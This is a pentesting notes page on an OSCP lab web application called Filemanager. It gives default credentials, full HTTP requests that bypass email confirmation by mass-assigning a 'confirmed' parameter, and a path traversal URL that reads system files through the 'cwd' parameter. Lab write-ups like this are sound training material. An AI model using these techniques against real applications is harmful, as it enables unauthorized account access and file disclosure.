Skip to content

Pentesting Filemanager

Default credentials

1
admin:admin

If the application allows registering, there exist a vulnerability in the email approval:

You can browse to http://192.168.108.231/ and register with an user. However that user will be disabled, but there is a feature for updating the email for sending the confirmation. If we update the email, note the request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
POST /settings/email HTTP/1.1
Host: 192.168.108.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.108.231/register/confirmation
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q
Content-Length: 188
Origin: http://192.168.108.231
Connection: keep-alive
Cookie: _boolean_session=efqmLjaUhvVwL9FTK7PcfsaBU8%2FHyK%2BKjqQhiKBfXg5IeMGx9FgpEOHuA6iZPm4oTDhcazyXDZsv3mqoANd2%2FPMzIawKqub2yn%2BIb0DSXC2d65%2BU%2B6dQZxA8j95ONmgViKjuOp%2B%2B6vWYFX0w9QE9wgM0uZeK3k0ENouQFbHe4CctWuKpX1v2C03da%2Ba9nUbb4nTOj7ujeAZjJQXtIIk%2BhoMzbY7hudxCHE8ZQ3TcewW8sbH6304znd%2F2aldKvDzN5roT6NYNmbi7vpmzC1MEoAmP6U17Mzr58See7fZ%2FL26%2Bc60PpQMoiw%3D%3D--IOslTlUAwizpZt9z--bSQuTZgN7u5vZVR9uOheVg%3D%3D
Priority: u=0

_method=patch&authenticity_token=jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q&user%5Bemail%5D=lala%40lala.com&confirmed=true&commit=Change%20email

And note the response:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Content-Type: application/json; charset=utf-8
Vary: Accept
ETag: W/"f71d3fd83aa3c9e6fdc84abcb05af92b"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: _boolean_session=vkkbGf9Od%2FIz3E0AgxragQ61gE3dTUAF041c64Ufk7hsZTqcUlNwtb1xjenWOkKJYwtdwpIHLBga2CYEYbjt1pQudKD0%2BoP17%2BzOjKI7w8638dS8%2BXnhzL2sy1K3JU3042dccj3Fl%2FNSRCFbQiOk7L%2B0hxyah5eu%2FjdSzExr8OmdHbqVJCzrRA6fF4cXKDFOB8gXhemj9Fr7SLOefT5yl%2BGhBsMuzqHchd4EEpMbbt3aXf0Y%2B5gKiivFcXGp1nyYilob96PXjU%2BaWmalbvvlTyCbuOKWqINYrZ1013XTuKafL8UpzD2pFQ%3D%3D--FHRuVvzEyO5zbcv6--%2Bo0j4K2pEIieQT%2B%2FNjqs%2Bw%3D%3D; path=/; HttpOnly; SameSite=Lax
X-Request-Id: d5410efe-8400-47ac-9b7f-d336307984c4
X-Runtime: 0.008355
Content-Length: 150

{"email":"lala@lala.com","id":2,"username":"admin2","confirmed":false,"created_at":"2026-02-13T22:15:30.099Z","updated_at":"2026-02-13T22:15:30.099Z"}

If we include in the request the parameter confirmed as true, we will be confirmed. See the request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
POST /settings/email HTTP/1.1
Host: 192.168.108.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.108.231/register/confirmation
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q
Content-Length: 108
Origin: http://192.168.108.231
Connection: keep-alive
Cookie: _boolean_session=efqmLjaUhvVwL9FTK7PcfsaBU8%2FHyK%2BKjqQhiKBfXg5IeMGx9FgpEOHuA6iZPm4oTDhcazyXDZsv3mqoANd2%2FPMzIawKqub2yn%2BIb0DSXC2d65%2BU%2B6dQZxA8j95ONmgViKjuOp%2B%2B6vWYFX0w9QE9wgM0uZeK3k0ENouQFbHe4CctWuKpX1v2C03da%2Ba9nUbb4nTOj7ujeAZjJQXtIIk%2BhoMzbY7hudxCHE8ZQ3TcewW8sbH6304znd%2F2aldKvDzN5roT6NYNmbi7vpmzC1MEoAmP6U17Mzr58See7fZ%2FL26%2Bc60PpQMoiw%3D%3D--IOslTlUAwizpZt9z--bSQuTZgN7u5vZVR9uOheVg%3D%3D
Priority: u=0

_method=patch&authenticity_token=&user[id]=1&user[username]=admin&user[confirmed]=true&commit=Change%20email

Then the response is 

1
{"confirmed":true,"id":2,"username":"admin2","email":"lala@lala.com","created_at":"2026-02-13T22:15:30.099Z","updated_at":"2026-02-13T22:33:14.621Z"}

Now click on the Boolean icon to navigate to the Filemanager applicaiton.

Path traversal

If the application includes the parameter cwd, we may inject a path traversal, like this:

1
http://192.168.108.231/?cwd=../../../../../../../../../../../../../../../../../../etc/hostname

Labs

OSCP Boolean

OSCP Filemanager

Last update: 2026-02-15
Created: February 15, 2026 15:52:07